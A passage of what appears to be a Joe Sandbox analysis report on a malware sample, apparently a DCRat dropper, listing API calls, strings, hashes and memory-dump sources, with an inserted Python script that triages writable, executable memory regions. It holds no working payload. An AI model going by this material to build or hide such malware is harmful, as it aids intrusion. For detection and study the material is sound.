                  • Part of subcall function 00898849: GetCurrentProcess.KERNEL32(C0000417,008A3958,00000050,008B0EE8), ref: 0089886D
                  • Part of subcall function 00898849: TerminateProcess.KERNEL32(00000000), ref: 00898874
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction ID: 89faab07ac052aee574ef9cf965d08256911e731e31041125f57d6cf9f3be296
                • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction Fuzzy Hash: A651A271E0011A9FDF18EFA8C8819ADBBF5FF58314F298169E854E7340E6319E01CB91
                APIs
                • __EH_prolog.LIBCMT ref: 00877730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008778CC
                  • Part of subcall function 0087A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A458
                  • Part of subcall function 0087A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A489
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 0cfed6116cc8e19647b4e48c3e526462f714528bb64281271c964971dae2906c
                • Instruction ID: 06ca6fb4fea43947b74eadafbd863f51a9c8cf137bfaff1817d38ef17836fa97
                • Opcode Fuzzy Hash: 0cfed6116cc8e19647b4e48c3e526462f714528bb64281271c964971dae2906c
                • Instruction Fuzzy Hash: 77415171805258AAEB24EB54CD45EEEB37CFF45300F0081A9B64DE6196EB749F84CF62
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 4bf14deb3bd738c59622c6c6aceac4ccefd2c9140886dda47675cd37b26d9cad
                • Instruction ID: ea5252018764aebddce1f9c4bb51c5c7551303f58a7aaea137f4bd0ae7e990de
                • Opcode Fuzzy Hash: 4bf14deb3bd738c59622c6c6aceac4ccefd2c9140886dda47675cd37b26d9cad
                • Instruction Fuzzy Hash: AF41713580025DABCF20AF25DC41FAB77AAFF85790B10C025F92CD725AE774DA41C661
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: d348b2d5225edf2e318a8bae6adaade219a8994463c47c5f4511e7d9403905fb
                • Instruction ID: 2eb9646891089aabc33bed1a88be6622996c165252b3d14e060bedc242255065
                • Opcode Fuzzy Hash: d348b2d5225edf2e318a8bae6adaade219a8994463c47c5f4511e7d9403905fb
                • Instruction Fuzzy Hash: 2E217E71204714DFDB18AF68C895A3A77A8FF88712B18856DF949DB282DF70ED00CB61
                APIs
                  • Part of subcall function 0087EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087EB92
                  • Part of subcall function 0087EB73: GetProcAddress.KERNEL32(008B81C0,CryptUnprotectMemory), ref: 0087EBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,0087EBEC), ref: 0087EC84
                Strings
                • CryptUnprotectMemory failed, xrefs: 0087EC7C
                • CryptProtectMemory failed, xrefs: 0087EC3B
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: a7702967f3cd607709a71d3511fda4038a45de1617e550498b79bf3f80187dd0
                • Instruction ID: c1d128d745b0a74df33836b511eaa64d2e90115a72c41fb58c68dc75db722b8f
                • Opcode Fuzzy Hash: a7702967f3cd607709a71d3511fda4038a45de1617e550498b79bf3f80187dd0
                • Instruction Fuzzy Hash: 3F11AF31A11624AFEB125B38CD066AE3B08FF49710B04C185FC09EF289CB34EE018BD5
                APIs
                • CreateThread.KERNEL32(00000000,00010000,008809D0,?,00000000,00000000), ref: 008808AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 008808F4
                  • Part of subcall function 00876E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876EAF
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 93ca95b957655f826e98d1be6daf3b88919395f506ef90d2c95304cb681699be
                • Instruction ID: fe8fc0a61d011184881ac896dd8540d99157851935bbe3198c1615f0e9b0dc82
                • Opcode Fuzzy Hash: 93ca95b957655f826e98d1be6daf3b88919395f506ef90d2c95304cb681699be
                • Instruction Fuzzy Hash: 6701D6B63443056FE6207F58EC82BB67398FB41711F20003DF686D22C1CEA1B8849F65
                APIs
                  • Part of subcall function 0087DA98: _swprintf.LIBCMT ref: 0087DABE
                  • Part of subcall function 0087DA98: _strlen.LIBCMT ref: 0087DADF
                  • Part of subcall function 0087DA98: SetDlgItemTextW.USER32(?,008AE154,?), ref: 0087DB3F
                  • Part of subcall function 0087DA98: GetWindowRect.USER32(?,?), ref: 0087DB79
                  • Part of subcall function 0087DA98: GetClientRect.USER32(?,?), ref: 0087DB85
                • GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                • SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 068077681f07a56d38f53829da080e9cde24d91e50f37f271d3fb549526186b4
                • Instruction ID: 3baf0033ac12f118b13420ea386bfc37e75b22b7ce07a2c8312e327948e42d54
                • Opcode Fuzzy Hash: 068077681f07a56d38f53829da080e9cde24d91e50f37f271d3fb549526186b4
                • Instruction Fuzzy Hash: 91F0693010024CA6DF250E68880DBEA3BA8FB21709F08C014BD6DD4EA5C778C995EA20
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,00880A78,?), ref: 00880854
                • GetLastError.KERNEL32(?), ref: 00880860
                  • Part of subcall function 00876E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00880869
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 34d2ca31dc5edfbafdd9d6160ffefe79e98843bbdfe060fe8a1befa2fd7a6652
                • Instruction ID: 095c0c1eed7399f157b9cdf3a867b6904efbb8cc515836bb466b1ce8f3b0810d
                • Opcode Fuzzy Hash: 34d2ca31dc5edfbafdd9d6160ffefe79e98843bbdfe060fe8a1befa2fd7a6652
                • Instruction Fuzzy Hash: ABD0123250892166DA1127689C0A9AF7905FB53730F604714F239D52F5EA25495146A6
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,0087D32F,?), ref: 0087DA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0087D32F,?), ref: 0087DA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 869889facea1aace7e41a3e485796e2a862609b3c5fe50e2e39da28eef42b1ab
                • Instruction ID: 2b34c24dd31429e072851d5462ef205df495d14f351e7c3c625ff1fb3e9ceb86
                • Opcode Fuzzy Hash: 869889facea1aace7e41a3e485796e2a862609b3c5fe50e2e39da28eef42b1ab
                • Instruction Fuzzy Hash: DAC0123128575076F73017306C0DB437D98BB13B11F09044CB145DA5D4D5E5C9408750
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID: 4$:$Y$j
                • API String ID: 0-2791243150
                • Opcode ID: cf63d68b67d758d274d175110285580694a8515161a453ce0f07eb483e233d67
                • Instruction ID: d3f591168f35df81e35e8a221da9b71e78f43a2072bacb2e83131678e2270ddf
                • Opcode Fuzzy Hash: cf63d68b67d758d274d175110285580694a8515161a453ce0f07eb483e233d67
                • Instruction Fuzzy Hash: 149118B0D096298FEBA8DF18C8997A9B7B1EB45304F1081EAD14DA3295DE346EC5CF44
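The function records above come from two very different memory sources: process 0 (the native QIKiV83Pkl.exe image at 0x870000, dumped with "based on PE: true") and process 5 (a 0x7FFAAC460000 region with no PE header, labelled portruntime). When a report carries hundreds of such records, the useful triage step is to decode each .sdmp source name and separate code that lives in a mapped image from code that lives in writable, non-image memory, which is where unpacked or JIT-emitted payloads such as the .NET DCRat stage end up. The script below is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It assumes the .sdmp name layout (process index, dump phase, stamp, base address, protection, an uninterpreted field, region type, an uninterpreted field); the protection and region-type readings are an inference from the values on this page (0x20/0x02/0x04/0x40 and 0x01000000/0x00020000 match the winnt.h PAGE_* and MEM_* constants) and are labelled as an assumption in the code. The sample text is a condensed copy of two records from this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Page protection and region type values as documented in winnt.h.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION (not documented on the page): an .sdmp name is
#   <process index>.<dump phase>.<stamp>.<base>.<protect>.<unknown>.<region type>.<unknown>.sdmp
# Fields 5 and 7 are read as PAGE_* and MEM_* values because the values in this report
# match those constants exactly; the two unknown fields are left uninterpreted.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<stamp>\d+)\.(?P<base>[0-9a-f]{16})\."
    r"(?P<prot>[0-9a-f]{8})\.[0-9a-f]{8}\.(?P<type>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp", re.I)


@dataclass
class DumpRegion:
    process: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:      # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
        return bool(self.protect & 0xF0)

    @property
    def writable(self) -> bool:        # PAGE_READWRITE, _WRITECOPY, _EXECUTE_READWRITE, _EXECUTE_WRITECOPY
        return bool(self.protect & 0xCC)


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(int(m["proc"], 16), int(m["base"], 16), int(m["prot"], 16), int(m["type"], 16))


@dataclass
class FunctionRecord:
    source: str = ""
    based_on_pe: Optional[bool] = None
    apis: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)   # Similarity and other key: value items

    @property
    def region(self) -> DumpRegion:
        return parse_sdmp_name(self.source)


SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report's function listing into records; every record ends with its Instruction Fuzzy Hash."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            current.apis.append(item)
        elif section == "Strings":
            current.strings.append(item)
        elif item.startswith("Source File:"):
            src, _, rest = item[len("Source File:"):].partition(",")
            current.source = src.strip()
            m = re.search(r"based on PE:\s*(true|false)", rest)
            current.based_on_pe = (m.group(1) == "true") if m else None
        elif ":" in item:
            key, _, value = item.partition(":")
            current.fields[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                records.append(current)
                current = FunctionRecord()
    return records


def triage(records: List[FunctionRecord]) -> List[Dict[str, object]]:
    """Flag functions that live in memory a benign process would not execute code from."""
    hits = []
    for rec in records:
        reg, reasons = rec.region, []
        if reg.executable and reg.writable:
            reasons.append(f"writable and executable ({reg.protect_name})")
        if reg.executable and reg.mem_type != 0x1000000:
            reasons.append(f"executable code outside a mapped image ({reg.type_name})")
        if reg.executable and rec.based_on_pe is False:
            reasons.append("no PE header at the dump base")
        if reasons:
            hits.append({"process": reg.process, "base": reg.base,
                         "opcode_id": rec.fields.get("Opcode ID", ""), "reasons": reasons})
    return hits


# Constructed sample: two records condensed from this report (one native, one from the .NET stage).
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(00000000,?,0087D32F,?), ref: 0087DA53
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,0087D32F,?), ref: 0087DA61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• API String ID: 3537982541-834975271
• Opcode ID: 869889facea1aace7e41a3e485796e2a862609b3c5fe50e2e39da28eef42b1ab
• Instruction Fuzzy Hash: DAC0123128575076F73017306C0DB437D98BB13B11F09044CB145DA5D4D5E5C9408750
Strings
Memory Dump Source
• Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
Similarity
• API ID:
• String ID: 4$:$Y$j
• API String ID: 0-2791243150
• Opcode ID: cf63d68b67d758d274d175110285580694a8515161a453ce0f07eb483e233d67
• Instruction Fuzzy Hash: 149118B0D096298FEBA8DF18C8997A9B7B1EB45304F1081EAD14DA3295DE346EC5CF44
"""

if __name__ == "__main__":
    for hit in triage(parse_records(SAMPLE)):
        print(f"process {hit['process']} base 0x{hit['base']:x} opcode {hit['opcode_id'][:16]}...: "
              + "; ".join(hit["reasons"]))
```

Run against a full report export, the script leaves the image-backed PAGE_EXECUTE_READ functions of process 0 alone and reports every function in process 5 as writable, executable, private and header-less, which is the set worth carving out of the dump and feeding to a .NET decompiler or comparing by Opcode ID against other DCRat submissions.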
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID: 89
                • API String ID: 0-211841788
                • Opcode ID: e5cf45a942690465b187fa5d01a71875acd93931721981ddb8b0f86d745ce3a8
                • Instruction ID: 69a82b00b6ca6d64380ac6928424b1e8a6d25851bd4c820aaf2509602af90758
                • Opcode Fuzzy Hash: e5cf45a942690465b187fa5d01a71875acd93931721981ddb8b0f86d745ce3a8
                • Instruction Fuzzy Hash: A261FA70D0DA1D8FEB94EB98D8596FDB7B1EF5A304F50417AD00DE3295DE34A8448B88
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cda8a3a1f278334e3642ef34949d81610c5ec50bbca09bda3569713ebde1915
                • Instruction ID: 68b021576d309d630a90cd13414a74bd0a71344f45b1a3141d889b4e9828eb37
                • Opcode Fuzzy Hash: 0cda8a3a1f278334e3642ef34949d81610c5ec50bbca09bda3569713ebde1915
                • Instruction Fuzzy Hash: 26E14C70D19A59CFEB98DB68C459BB8B7A1FF59304F0481BAD00ED7296CA34A844CF85
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction ID: b2d8fdc751a51b7bcd566e64c48110306845d46cd63f0e07bedbd45003ae1e1c
                • Opcode Fuzzy Hash: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction Fuzzy Hash: 49B15C47A8E6C18FF311677CA42A5F57F90DF92229B0881B7D18DCA19BDC04E88D47D9
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1f94f7985e9440378802bb1bd4ea2f5543ed92064d221ed180f8a56cf51be188
                • Instruction ID: 3bff0f4a49ed81791dd0352347183dd23aea0c13c688991d804e879b2fdef50f
                • Opcode Fuzzy Hash: 1f94f7985e9440378802bb1bd4ea2f5543ed92064d221ed180f8a56cf51be188
                • Instruction Fuzzy Hash: 56D12F70D1A659CFEB58DB68C458ABCBBB1FF1A305F108179D00EE3291CA39A845CF85
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction ID: f786b9c071f9a0a16d067e9870ed148293c1abf2632b77481740de1743e3e12c
                • Opcode Fuzzy Hash: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction Fuzzy Hash: 6F915B4698E6C18FF31163BCA81E5F5AF90DF92229B0C81B7D18DCA19BDC14D84D87DA
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction ID: 5422cddc497bfd18bd0fb239d44378cd121397938612fbb452f37888b1ec415b
                • Opcode Fuzzy Hash: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction Fuzzy Hash: B891A331A1CA498FEB58DB1CC8556B9B7E2FF99314B14457AE44EC328ACE34EC0687C5
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction ID: 9a410cc385674370986a9d95e0dda22ed3ae4a0ee11c904a32e929a29220ac7a
                • Opcode Fuzzy Hash: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction Fuzzy Hash: C4814C4698E7C18FF21163BCA41E5F5AF90DF92228B0881B7D18D8A19FDC14D84D87DA
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction ID: 60071755b694b5c48a1307d32ef2a6aed54de2d2f8a86e80eec9cea43d264ab9
                • Opcode Fuzzy Hash: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction Fuzzy Hash: 2081394694E6C18FF311636CA41D5F5AF90EF92229B0881B7D04DCA19FDC14D84D87D9
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction ID: 9abdf59c296853c0ea7062fe78a2ed017ad45cb9f1bd905600ad2b39bddc17fd
                • Opcode Fuzzy Hash: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction Fuzzy Hash: DF713B8698E7C18FF21153BCA41E5F5AF90EF52229B0881B7D18D8A19FDC14D84D87DA
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 296213b904145389411b14a519a82879a1d64f754d1fda06e5d13edaf3a22697
                • Instruction ID: bfe13705c3d6d6f9268caaa769a5851c8f61926342ea01b480592b9d110092a6
                • Opcode Fuzzy Hash: 296213b904145389411b14a519a82879a1d64f754d1fda06e5d13edaf3a22697
                • Instruction Fuzzy Hash: 2C71EA70D0952D8FEB94EB98C859BEDB7B1EF59304F1081BAD00DE3295CF7999848B84
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b28effb189e4e0d458b9c003e876b8eb44ca932ead3fb4a2d953df6fcec1a346
                • Instruction ID: 5f733ae70c15372f3597116e96187a6e249276ede3c27f0796b1777ee3c5317b
                • Opcode Fuzzy Hash: b28effb189e4e0d458b9c003e876b8eb44ca932ead3fb4a2d953df6fcec1a346
                • Instruction Fuzzy Hash: D051C331A18B498FEB48DF18C8586BAB7E2FF99305B14857ED44EC7285CE34E8068785
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a0f87eb0cd68bed415bf4dbcb2cbeeee9ff11ad3a4358b0bedbc732a489626a
                • Instruction ID: e2d81c10897f87c0f194d4fce7c3060f8c2ae35d931581303622176a131d1be7
                • Opcode Fuzzy Hash: 9a0f87eb0cd68bed415bf4dbcb2cbeeee9ff11ad3a4358b0bedbc732a489626a
                • Instruction Fuzzy Hash: D341D63198D61A8BF755BBB8E4195FDB7E0EF06329F00857BD00DC5296DE34A0988794
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fcebf78c2cd682a6a95b1e5d96135b8de5d4e150373a0b24f0975280509b244c
                • Instruction ID: dd9485ced2b1dbd74ed8c70da459946e82f8442d7a572aeb342da984ea734749
                • Opcode Fuzzy Hash: fcebf78c2cd682a6a95b1e5d96135b8de5d4e150373a0b24f0975280509b244c
                • Instruction Fuzzy Hash: 62512970D0968DCFEB54EB98C4486ECB7F0EF5A305F50817AD40DE7299DE78A9488B84
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4f9f5e65ece25f9951d65e537dbc6fff34f027321f6d684dc80b75b7ad0d113
                • Instruction ID: 4a15cef9cae778ad57cb4bfafeffd9dbc38949a60c7bc4ce1199dda274195273
                • Opcode Fuzzy Hash: e4f9f5e65ece25f9951d65e537dbc6fff34f027321f6d684dc80b75b7ad0d113
                • Instruction Fuzzy Hash: F0417B31A0EA498FF365D738C8491B9FBE0EF87304B0485BBD44DC71A6DE28E8458385
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c4f6883b08a6b079497a9420532e5e6e69c6e1fb8920903d31adcc5b278863a
                • Instruction ID: 57e56f32f98d53ef89237da919a952ceae1627878b1f43cae9dd916e75e263ff
                • Opcode Fuzzy Hash: 2c4f6883b08a6b079497a9420532e5e6e69c6e1fb8920903d31adcc5b278863a
                • Instruction Fuzzy Hash: D741C67190D98E8FFB94DB6CC859ABDBBE0FF1A314F048179D00ED7296CE24A8008744
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41a9b5fb21a80cee7752cee941c40ecf0410a77dfe6fed6b3bcc961f2cde59ea
                • Instruction ID: 5a7f014b7fcf2e59277f6eeee848c04fc4337d5566f02fac95688ad18592b0aa
                • Opcode Fuzzy Hash: 41a9b5fb21a80cee7752cee941c40ecf0410a77dfe6fed6b3bcc961f2cde59ea
                • Instruction Fuzzy Hash: 93411B62A4EBD69FF3439BBC88590E9BFA1FF5321570881BBC088C7097DA149819D3D5
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 157f9db83e01f3b4199eb0ed7dcac27e2e2143ca32e2be4f43866b643e4ee4b2
                • Instruction ID: df52230f2047d1842e8c10e92ae4e959f3246d59397c808d9395a1648ea12a1f
                • Opcode Fuzzy Hash: 157f9db83e01f3b4199eb0ed7dcac27e2e2143ca32e2be4f43866b643e4ee4b2
                • Instruction Fuzzy Hash: 1031D8729CD656CBF7557BA8E41D4FCB790AF0232AF048137D00DC529BCE24B08886D8
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3484ce6ceaccaaa53ebaa1ae27b0d132a388d199de07e35c9654e0832196f82b
                • Instruction ID: 5b23a6018d234cf6bee377a40ffc27710757a9c0b44da6f5db76811e052b2dae
                • Opcode Fuzzy Hash: 3484ce6ceaccaaa53ebaa1ae27b0d132a388d199de07e35c9654e0832196f82b
                • Instruction Fuzzy Hash: FD217992A4D6829BF341A7BCD85D2E9BFD0FF52218F088077D04DC8187ED04E449C2C8
                Memory Dump Source
